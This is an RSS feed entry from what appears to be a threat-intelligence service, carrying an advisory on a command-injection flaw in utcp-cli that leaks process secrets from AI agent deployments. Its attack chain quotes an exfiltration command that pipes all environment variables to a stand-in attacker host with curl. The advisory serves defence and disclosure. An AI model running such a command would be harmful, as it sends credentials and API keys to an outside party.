<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Utcp-Cli (&lt;= 1.1.1) — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/utcp-cli--1.1.1/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 14 May 2026 20:56:53 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/utcp-cli--1.1.1/feed.xml" rel="self" type="application/rss+xml"/><item><title>python-utcp: Secrets Leakage via Command Injection</title><link>https://feed.craftedsignal.io/briefs/2026-05-python-utcp-secrets-leakage/</link><pubDate>Thu, 14 May 2026 20:56:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-python-utcp-secrets-leakage/</guid><description>A command injection vulnerability in `utcp-cli` versions 1.1.1 and earlier allows attackers to exfiltrate all process-level secrets by injecting commands into CLI subprocesses.</description><content:encoded><![CDATA[<p>The <code>utcp-cli</code> library, in versions 1.1.1 and earlier, is vulnerable to command injection (CVE-2026-45370) due to the insecure handling of environment variables passed to subprocesses. Specifically, the <code>_prepare_environment()</code> function copies the entire <code>os.environ</code> dictionary to CLI subprocesses. Combined with a separate command injection vulnerability (GHSA-33p6-5jxp-p3x4) in <code>_substitute_utcp_args()</code>, this design allows an attacker to inject commands that can access and exfiltrate sensitive information stored in environment variables. This includes cloud provider credentials, database connection strings, LLM API keys, and internal service tokens. This vulnerability allows full process environment leakage, enabling complete system compromise for AI agent deployments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker crafts a malicious tool configuration containing the command injection payload.</li>
<li>The AI agent executes the tool, passing the malicious configuration to <code>utcp-cli</code>.</li>
<li>The <code>_substitute_utcp_args()</code> function fails to sanitize the attacker-supplied arguments, leading to command injection.</li>
<li>The <code>_prepare_environment()</code> function copies the entire <code>os.environ</code> to the subprocess environment.</li>
<li>The injected command executes with access to all environment variables.</li>
<li>The injected command, such as <code>env | curl -s -d @- https://attacker.com</code>, captures the environment variables and exfiltrates them to an attacker-controlled server.</li>
<li>The attacker receives the environment variables, including sensitive credentials and API keys.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to steal sensitive information, including cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET), database connection strings (DATABASE_URL), LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY), and internal service tokens. The attacker can use these stolen credentials to gain unauthorized access to cloud resources, databases, LLM services, and internal systems. This can lead to data breaches, financial loss, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to <code>utcp-cli &gt;= 1.1.2</code> to address the vulnerability and prevent environment variable leakage.</li>
<li>Monitor network traffic for suspicious outbound connections to unknown domains (e.g., <code>https://attacker.com</code> in the example) originating from <code>utcp-cli</code> processes.</li>
<li>Implement the Sigma rule to detect command injection attempts in <code>utcp-cli</code> processes by monitoring for suspicious shell metacharacters in command-line arguments.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>secrets-leakage</category><category>python</category></item></channel></rss>